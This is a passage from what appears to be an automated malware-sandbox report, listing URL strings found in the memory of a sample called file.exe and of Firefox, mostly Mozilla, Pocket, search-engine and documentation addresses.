Source: file.exe, 00000000.00000002.2514256490.0000000028D61000.00000004.00000020.00020000.00000000.sdmp, firefox.exe, 0000001F.00000002.2972528823.000001B114D7A000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://bridge.sfo1.ap01.net/ctp?version=16.0.0&key=1696425136400800000.1&ci=1696425136743.12791&cta
Source: firefox.exe, 0000001F.00000002.2978854207.000001B115687000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://bugzilla.mo
Source: firefox.exe, 0000001F.00000002.2965917115.000001B111B27000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://bugzilla.mozilla.org/show_bug.cgi?id=1238180
Source: firefox.exe, 0000001F.00000002.2954167196.000001B106621000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://bugzilla.mozilla.org/show_bug.cgi?id=1539075
Source: firefox.exe, 0000001F.00000002.2954167196.000001B106621000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://bugzilla.mozilla.org/show_bug.cgi?id=1584464
Source: firefox.exe, 0000001F.00000002.2954167196.000001B106621000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://bugzilla.mozilla.org/show_bug.cgi?id=1607439
Source: firefox.exe, 0000001F.00000002.2954167196.000001B106621000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://bugzilla.mozilla.org/show_bug.cgi?id=1616739
Source: file.exe, 00000000.00000003.2123124087.00000000027DC000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
Source: file.exe, 00000000.00000003.2123124087.00000000027DC000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
Source: file.exe, 00000000.00000003.2123124087.00000000027DC000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
Source: firefox.exe, 0000001F.00000002.2967668979.000001B112900000.00000002.08000000.00040000.00000000.sdmp String found in binary or memory: https://color.firefox.com/?utm_source=firefox-browser&utm_medium=firefox-browser&utm_content=theme-f
Source: firefox.exe, 0000001F.00000002.3006356102.000001B11BFAE000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://completion.amazon.com/search/complete?q=
Source: firefox.exe, 0000001F.00000002.2965917115.000001B111B27000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://content-signature-2.cdn.mozilla.net/chains/remote-settings.content-signature.mozilla.org-202
Source: firefox.exe, 0000001F.00000002.2967668979.000001B112900000.00000002.08000000.00040000.00000000.sdmp String found in binary or memory: https://content.cdn.mozilla.net
Source: file.exe, 00000000.00000002.2514256490.0000000028D61000.00000004.00000020.00020000.00000000.sdmp, firefox.exe, 0000001F.00000002.2972528823.000001B114D7A000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://contile-images.services.mozilla.com/obgoOYObjIFea_bXuT6L4LbBJ8j425AD87S1HMD3BWg.9991.jpg
Source: file.exe, 00000000.00000002.2514256490.0000000028D61000.00000004.00000020.00020000.00000000.sdmp, firefox.exe, 0000001F.00000002.2972528823.000001B114D7A000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://contile-images.services.mozilla.com/u1AuJcj32cbVUf9NjMipLXEYwu2uFIt4lsj-ccwVqEs.36904.jpg
Source: firefox.exe, 0000001F.00000002.2954167196.000001B10663A000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://contile.services.mozilla.com
Source: firefox.exe, 0000001F.00000002.2955694353.000001B106740000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://contile.services.mozilla.com/
Source: firefox.exe, 0000001F.00000002.2955694353.000001B106740000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://contile.services.mozilla.com/v1/tiles
Source: firefox.exe, 0000001F.00000002.2967668979.000001B112900000.00000002.08000000.00040000.00000000.sdmp String found in binary or memory: https://coverage.mozilla.org
Source: firefox.exe, 0000001F.00000002.2953298471.000001B104830000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://crash-reports.mozilla.com/submit?id=
Source: firefox.exe, 0000001F.00000002.2967668979.000001B112900000.00000002.08000000.00040000.00000000.sdmp String found in binary or memory: https://crash-stats.mozilla.org/report/index/
Source: firefox.exe, 0000001F.00000003.2938950464.000001B11E09C000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001F.00000003.2939661646.000001B11E0A8000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001F.00000003.2940678415.000001B11E0A8000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://crbug.com/993268
Source: firefox.exe, 0000001F.00000002.2967668979.000001B112900000.00000002.08000000.00040000.00000000.sdmp String found in binary or memory: https://dap-02.api.divviup.org
Source: firefox.exe, 0000001F.00000002.2988472196.000001B1166E7000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://developer.mozilla.org/docs/Mozilla/Add-ons/WebExtensions/API/tabs/captureTab
Source: firefox.exe, 0000001F.00000002.2977902374.000001B1153F0000.00000002.08000000.00040000.00000000.sdmp String found in binary or memory: https://developer.mozilla.org/docs/Mozilla/Add-ons/WebExtensions/API/tabs/captureTabPlease
Source: firefox.exe, 0000001F.00000002.2988472196.000001B1166E7000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://developer.mozilla.org/docs/Web/API/Element/releasePointerCapture
Source: firefox.exe, 0000001F.00000002.2977902374.000001B1153F0000.00000002.08000000.00040000.00000000.sdmp String found in binary or memory: https://developer.mozilla.org/docs/Web/API/Element/releasePointerCaptureOffscreenCanvas.toBlob()
Source: firefox.exe, 0000001F.00000002.2977902374.000001B1153F0000.00000002.08000000.00040000.00000000.sdmp String found in binary or memory: https://developer.mozilla.org/docs/Web/API/Element/releasePointerCaptureRequest
Source: firefox.exe, 0000001F.00000002.2988472196.000001B1166E7000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://developer.mozilla.org/docs/Web/API/Element/setPointerCapture
Source: firefox.exe, 0000001F.00000002.2977902374.000001B1153F0000.00000002.08000000.00040000.00000000.sdmp String found in binary or memory: https://developer.mozilla.org/docs/Web/API/Element/setPointerCaptureInstallTrigger.install()
Source: firefox.exe, 0000001F.00000002.2988472196.000001B1166E7000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://developer.mozilla.org/docs/Web/API/Push_API/Using_the_Push_API#Encryption
Source: firefox.exe, 0000001F.00000002.2977902374.000001B1153F0000.00000002.08000000.00040000.00000000.sdmp String found in binary or memory: https://developer.mozilla.org/docs/Web/API/Push_API/Using_the_Push_API#Encryptiondocument.requestSto
Source: firefox.exe, 0000001F.00000002.2988472196.000001B1166E7000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://developer.mozilla.org/en-US/docs/Glossary/speculative_parsing
Source: firefox.exe, 0000001F.00000002.2977902374.000001B1153F0000.00000002.08000000.00040000.00000000.sdmp String found in binary or memory: https://developer.mozilla.org/en-US/docs/Glossary/speculative_parsingTrying
Source: firefox.exe, 0000001F.00000003.2938950464.000001B11E09C000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001F.00000003.2939661646.000001B11E0A8000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001F.00000003.2940678415.000001B11E0A8000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://developer.mozilla.org/en-US/docs/Web/API/ElementCSSInlineStyle/style#setting_styles)
Source: firefox.exe, 0000001F.00000003.2938950464.000001B11E09C000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001F.00000003.2939661646.000001B11E0A8000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001F.00000003.2940678415.000001B11E0A8000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://developer.mozilla.org/en-US/docs/Web/JavaScript/Reference/Statements/for-await...of
Source: firefox.exe, 0000001F.00000003.2938950464.000001B11E09C000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001F.00000003.2939661646.000001B11E0A8000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001F.00000003.2940678415.000001B11E0A8000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://developer.mozilla.org/en-US/docs/Web/Web_Components/Using_custom_elements#using_the_lifecycl
Source: firefox.exe, 0000001F.00000002.2967668979.000001B112900000.00000002.08000000.00040000.00000000.sdmp String found in binary or memory: https://developers.google.com/safe-browsing/v4/advisory
Source: firefox.exe, 0000001F.00000002.2972528823.000001B114D7A000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://duckduckgo.com
Source: firefox.exe, 0000001F.00000003.2916313880.000001B112C00000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001F.00000003.2916533692.000001B112E1C000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001F.00000002.2984824415.000001B1161D7000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001F.00000003.2916983014.000001B112E5F000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://duckduckgo.com/
Source: firefox.exe, 0000001F.00000002.3024126644.00002E551AD00000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://duckduckgo.com/?Zy
Source: file.exe, 00000000.00000003.2123124087.00000000027DC000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://duckduckgo.com/ac/?q=
Source: file.exe, 00000000.00000003.2123124087.00000000027DC000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://duckduckgo.com/chrome_newtab
Source: file.exe, 00000000.00000003.2123124087.00000000027DC000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
Source: firefox.exe, 0000001F.00000002.2965917115.000001B111B7B000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001F.00000002.2974564214.000001B114F7D000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001F.00000002.2963021945.000001B11157D000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001F.00000002.2972528823.000001B114DC5000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://e.mail.ru/cgi-bin/sentmsg?mailto=%s
Source: firefox.exe, 0000001F.00000002.2965917115.000001B111B7B000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://e.mail.ru/cgi-bin/sentmsg?mailto=%sresource://gre/modules/FileUtils.sys.mjsScheme
Source: firefox.exe, 0000001F.00000002.2972528823.000001B114DC5000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://e.mail.ru/cgi-bin/sentmsg?mailto=%sz
Source: firefox.exe, 0000001F.00000002.2972528823.000001B114DC5000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://e.mail.ru/cgi-bin/sentmsg?mailto=%szw
Source: firefox.exe, 0000001F.00000002.2965917115.000001B111B7B000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001F.00000002.2974564214.000001B114F7D000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001F.00000002.2972528823.000001B114DC5000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://email.seznam.cz/newMessageScreen?mailto=%s
Source: firefox.exe, 0000001F.00000002.2988472196.000001B1166E7000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://extensionworkshop.com/documentation/publish/self-distribution/
Source: firefox.exe, 0000001F.00000002.2977902374.000001B1153F0000.00000002.08000000.00040000.00000000.sdmp String found in binary or memory: https://extensionworkshop.com/documentation/publish/self-distribution/initMouseEvent()
Source: firefox.exe, 0000001F.00000002.2972528823.000001B114D7A000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001F.00000002.3016689132.000001B11D682000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://firefox-api-proxy.cdn.mozilla.net/
Source: firefox.exe, 0000001F.00000002.3014298183.000001B11C458000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://firefox-settings-attachments.cdn.mozilla.net/main-workspace/ms-images/673d2808-e5d8-41b9-957
Source: firefox.exe, 0000001F.00000002.3014298183.000001B11C458000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://firefox-settings-attachments.cdn.mozilla.net/main-workspace/ms-images/706c7a85-cf23-442e-8a9
Source: firefox.exe, 0000001F.00000002.3014298183.000001B11C458000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://firefox-settings-attachments.cdn.mozilla.net/main-workspace/ms-images/d8e772fe-4909-4f05-9f9
Source: firefox.exe, 0000001F.00000002.3014298183.000001B11C458000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://firefox-settings-attachments.cdn.mozilla.net/main-workspace/ms-images/f0f51715-7f5e-48de-839
Source: firefox.exe, 0000001F.00000002.2967668979.000001B112900000.00000002.08000000.00040000.00000000.sdmp String found in binary or memory: https://firefox-source-docs.mozilla.org/networking/dns/trr-skip-reasons.html#
Source: firefox.exe, 0000001F.00000002.2977814930.000001B1153C0000.00000002.08000000.00040000.00000000.sdmp String found in binary or memory: https://firefox-source-docs.mozilla.org/performance/scroll-linked_effects.html
Source: firefox.exe, 0000001F.00000002.2965917115.000001B111B27000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://firefox-source-docs.mozilla.org/remote/Security.html
Source: firefox.exe, 0000001F.00000002.2965917115.000001B111B7B000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://firefox.settings.services.allizom.org/v1/buckets/main-preview/collections/search-config/reco
Source: firefox.exe, 0000001F.00000002.2965917115.000001B111B7B000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://firefox.settings.services.allizom.org/v1/buckets/main/collections/search-config/records
Source: firefox.exe, 0000001F.00000002.2965917115.000001B111B7B000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://firefox.settings.services.mozilla.com/v1/buckets/main-preview/collections/search-config/reco
Source: firefox.exe, 0000001F.00000002.2965917115.000001B111B7B000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://firefox.settings.services.mozilla.com/v1/buckets/main/collections/search-config/records
Source: firefox.exe, 0000001F.00000002.2965917115.000001B111B7B000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://firefox.settings.services.mozilla.com/v1/buckets/main/collections/search-config/recordshttps
Source: firefox.exe, 0000001F.00000002.3024586000.00003E9C36B3A000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001F.00000002.2962205193.000001B1110E5000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://fpn.firefox.com
Source: firefox.exe, 0000001F.00000002.2967668979.000001B112900000.00000002.08000000.00040000.00000000.sdmp String found in binary or memory: https://fpn.firefox.com/browser?utm_source=firefox-desktop&utm_medium=referral&utm_campaign=about-pr
Source: firefox.exe, 0000001F.00000002.2967668979.000001B112900000.00000002.08000000.00040000.00000000.sdmp String found in binary or memory: https://ftp.mozilla.org/pub/labs/devtools/adb-extension/#OS#/adb-extension-latest-#OS#.xpi
Source: firefox.exe, 0000001F.00000002.2972528823.000001B114D7A000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001F.00000002.3016689132.000001B11D682000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://getpocket.cdn.mozilla.net/
Source: firefox.exe, 0000001F.00000002.2955694353.000001B106740000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001F.00000002.3016689132.000001B11D682000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://getpocket.cdn.mozilla.net/v3/firefox/global-recs?version=3&consumer_key=$apiKey&locale_lang=
Source: firefox.exe, 0000001F.00000002.2965917115.000001B111BDD000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001F.00000002.3016689132.000001B11D682000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://getpocket.cdn.mozilla.net/v3/firefox/trending-topics?version=2&consumer_key=$apiKey&locale_l
Source: firefox.exe, 0000001F.00000002.3016689132.000001B11D682000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://getpocket.cdn.mozilla.net/v3/newtab/layout?version=1&consumer_key=$apiKey&layout_variant=bas
Source: firefox.exe, 0000001F.00000002.2972528823.000001B114D7A000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001F.00000002.2972528823.000001B114D03000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://getpocket.cdn.mozilla.net/v3/newtab/layout?version=1&consumer_key=40249-e88c401e1b1f2242d9e4
Source: firefox.exe, 0000001F.00000002.2972528823.000001B114D7A000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001F.00000002.2972528823.000001B114D03000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://getpocket.com/explore/career?utm_source=pocket-newtab
Source: firefox.exe, 0000001F.00000002.2955694353.000001B106740000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://getpocket.com/explore/career?utm_source=pocket-newtabL
Source: firefox.exe, 0000001F.00000002.2972528823.000001B114D7A000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001F.00000002.2972528823.000001B114D03000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://getpocket.com/explore/entertainment?utm_source=pocket-newtab
Source: firefox.exe, 0000001F.00000002.2955694353.000001B106740000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://getpocket.com/explore/entertainment?utm_source=pocket-newtabC
Source: firefox.exe, 0000001F.00000002.2972528823.000001B114D7A000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001F.00000002.2972528823.000001B114D03000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://getpocket.com/explore/food?utm_source=pocket-newtab
Source: firefox.exe, 0000001F.00000002.2955694353.000001B106740000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://getpocket.com/explore/food?utm_source=pocket-newtabA
Source: firefox.exe, 0000001F.00000002.2972528823.000001B114D7A000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001F.00000002.2972528823.000001B114D03000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://getpocket.com/explore/health?utm_source=pocket-newtab
Source: firefox.exe, 0000001F.00000002.2955694353.000001B106740000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://getpocket.com/explore/health?utm_source=pocket-newtabE
Source: firefox.exe, 0000001F.00000002.2972528823.000001B114D7A000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001F.00000002.2972528823.000001B114D03000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://getpocket.com/explore/science?utm_source=pocket-newtab
Source: firefox.exe, 0000001F.00000002.2955694353.000001B106740000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://getpocket.com/explore/science?utm_source=pocket-newtabG
Source: firefox.exe, 0000001F.00000002.2972528823.000001B114D7A000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001F.00000002.2972528823.000001B114D03000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://getpocket.com/explore/self-improvement?utm_source=pocket-newtab
Source: firefox.exe, 0000001F.00000002.2955694353.000001B106740000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://getpocket.com/explore/self-improvement?utm_source=pocket-newtab?
Source: firefox.exe, 0000001F.00000002.2972528823.000001B114D7A000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001F.00000002.2972528823.000001B114D03000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://getpocket.com/explore/technology?utm_source=pocket-newtab
Source: firefox.exe, 0000001F.00000002.2955694353.000001B106740000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://getpocket.com/explore/technology?utm_source=pocket-newtabN
Source: firefox.exe, 0000001F.00000002.2965917115.000001B111BDD000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://getpocket.com/explore/trending?src=fx_new_tab
Source: firefox.exe, 0000001F.00000002.3016689132.000001B11D682000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://getpocket.com/explore/trending?src=fx_new_tabL
Source: firefox.exe, 0000001F.00000002.2972528823.000001B114D7A000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001F.00000002.2972528823.000001B114D03000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://getpocket.com/explore?utm_source=pocket-newtab
Source: firefox.exe, 0000001F.00000002.2955694353.000001B106740000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://getpocket.com/explore?utm_source=pocket-newtabI
Source: firefox.exe, 0000001F.00000002.2955694353.000001B106740000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://getpocket.com/firefox/new_tab_learn_more
Source: firefox.exe, 0000001F.00000002.2955694353.000001B106740000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://getpocket.com/firefox/new_tab_learn_more/
Source: firefox.exe, 0000001F.00000002.2965917115.000001B111BDD000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://getpocket.com/recommendations
Source: firefox.exe, 0000001F.00000002.3016689132.000001B11D682000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://getpocket.com/recommendationsS
Source: firefox.exe, 0000001F.00000002.3016689132.000001B11D682000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://getpocket.com/recommendationsS7
Source: firefox.exe, 0000001F.00000002.3016689132.000001B11D682000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://getpocket.com/v3/newtab/layout?version=1&consumer_key=$apiKey&layout_variant=basic
Source: firefox.exe, 0000001F.00000002.2975520738.000001B115003000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://github.com/
Source: firefox.exe, 0000001F.00000003.2938950464.000001B11E09C000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001F.00000003.2939661646.000001B11E0A8000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001F.00000003.2940678415.000001B11E0A8000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://github.com/google/closure-compiler/issues/3177
Source: firefox.exe, 0000001F.00000003.2939661646.000001B11E0F2000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://github.com/lit/lit/blob/main/packages/reactive-element/src/decorators/query-all.ts
Source: firefox.exe, 0000001F.00000003.2939661646.000001B11E0F2000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://github.com/lit/lit/blob/main/packages/reactive-element/src/decorators/query.ts
Source: firefox.exe, 0000001F.00000003.2938950464.000001B11E09C000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001F.00000003.2939661646.000001B11E0A8000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001F.00000003.2940678415.000001B11E0A8000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://github.com/lit/lit/issues/1266
Source: firefox.exe, 0000001F.00000003.2938950464.000001B11E09C000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001F.00000003.2939661646.000001B11E0A8000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001F.00000003.2940678415.000001B11E0A8000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://github.com/microsoft/TypeScript/issues/338).
Source: firefox.exe, 0000001F.00000003.2916313880.000001B112C00000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001F.00000002.2965917115.000001B111B7B000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001F.00000003.2916533692.000001B112E1C000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001F.00000003.2916983014.000001B112E5F000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001F.00000002.2959421322.000001B106A00000.00000002.08000000.00040000.00000000.sdmp String found in binary or memory: https://github.com/mozilla-services/screenshots
Source: firefox.exe, 0000001F.00000002.2965917115.000001B111B7B000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://github.com/mozilla-services/screenshotsshims/google-analytics-ecommerce-plugin.jsextension/d
Source: firefox.exe, 0000001F.00000002.2954167196.000001B106621000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://github.com/w3c/csswg-drafts/blob/master/css-grid-2/MASONRY-EXPLAINER.md
Source: firefox.exe, 0000001F.00000002.2954167196.000001B106621000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://github.com/w3c/csswg-drafts/issues/4650
Source: firefox.exe, 0000001F.00000002.2965917115.000001B111B27000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001F.00000002.3016689132.000001B11D682000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://github.com/zertosh/loose-envify)
Source: firefox.exe, 0000001F.00000002.2972528823.000001B114D7A000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://google.com
Source: firefox.exe, 0000001F.00000002.2954167196.000001B106621000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://gpuweb.github.io/gpuweb/
Source: firefox.exe, 0000001F.00000002.2967668979.000001B112900000.00000002.08000000.00040000.00000000.sdmp String found in binary or memory: https://helper1.dap.cloudflareresearch.com/v02
Source: firefox.exe, 0000001F.00000002.2953298471.000001B104803000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://hg.mozilla.org/releases/mozilla-release/rev/68e4c357d26c5a1f075a1ec0c696d4fe684ed881
Source: firefox.exe, 0000001F.00000002.2967668979.000001B112900000.00000002.08000000.00040000.00000000.sdmp String found in binary or memory: https://ideas.mozilla.org/
Source: firefox.exe, 0000001F.00000002.2955694353.000001B106740000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://img-getpocket.cdn.mozilla.net/X
Source: firefox.exe, 0000001F.00000002.2972528823.000001B114D7A000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://imp.mt48.net/static?id=7RHzfOIXjFEYsBdvIpkX4Qqm4p8dfCfm4pbW1pbWfpbW7ReNxR3UIG8zInwYIFIVs9eYi
Source: firefox.exe, 0000001F.00000002.2967668979.000001B112900000.00000002.08000000.00040000.00000000.sdmp String found in binary or memory: https://incoming.telemetry.mozilla.org
Source: firefox.exe, 0000001F.00000002.2972528823.000001B114D7A000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://incoming.telemetry.mozilla.org/submit
Source: firefox.exe, 0000001F.00000002.3016689132.000001B11D682000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://incoming.telemetry.mozilla.org/submits
Source: firefox.exe, 0000001F.00000003.2938950464.000001B11E09C000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001F.00000003.2939661646.000001B11E0A8000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001F.00000003.2940678415.000001B11E0A8000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://infra.spec.whatwg.org/#ascii-whitespace
Source: firefox.exe, 0000001F.00000002.2967668979.000001B112900000.00000002.08000000.00040000.00000000.sdmp String found in binary or memory: https://install.mozilla.org
Source: firefox.exe, 0000001F.00000002.3006356102.000001B11BFBC000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://json-schema.org/draft/2019-09/schema
Source: firefox.exe, 0000001F.00000003.2938950464.000001B11E09C000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001F.00000003.2939661646.000001B11E0A8000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001F.00000003.2940678415.000001B11E0A8000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://lit.dev/docs/libraries/standalone-templates/#rendering-lit-html-templates
Source: firefox.exe, 0000001F.00000003.2938950464.000001B11E09C000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001F.00000003.2939661646.000001B11E0A8000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001F.00000003.2940678415.000001B11E0A8000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://lit.dev/docs/templates/directives/#stylemap
Source: firefox.exe, 0000001F.00000003.2938950464.000001B11E09C000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001F.00000003.2939661646.000001B11E0A8000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001F.00000003.2940678415.000001B11E0A8000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://lit.dev/docs/templates/expressions/#child-expressions)
Source: firefox.exe, 0000001F.00000002.2962205193.000001B11107F000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001F.00000002.2977960842.000001B115408000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://location.services.mozilla.com
Source: firefox.exe, 0000001F.00000002.2977960842.000001B115408000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://location.services.mozilla.com/
Source: firefox.exe, 0000001F.00000002.2967668979.000001B112900000.00000002.08000000.00040000.00000000.sdmp String found in binary or memory: https://location.services.mozilla.com/v1/country?key=%MOZILLA_API_KEY%
Source: firefox.exe, 0000001F.00000002.2977960842.000001B115431000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001F.00000002.2969238159.000001B112DCB000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://location.services.mozilla.com/v1/country?key=7e40f68c-7938-4c5d-9f95-e61647c213eb
Source: firefox.exe, 0000001F.00000002.2965917115.000001B111B7B000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001F.00000002.2974564214.000001B114F7D000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001F.00000002.2964737783.000001B111ABA000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001F.00000002.2972528823.000001B114DC5000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://mail.google.com/mail/?extsrc=mailto&url=%s
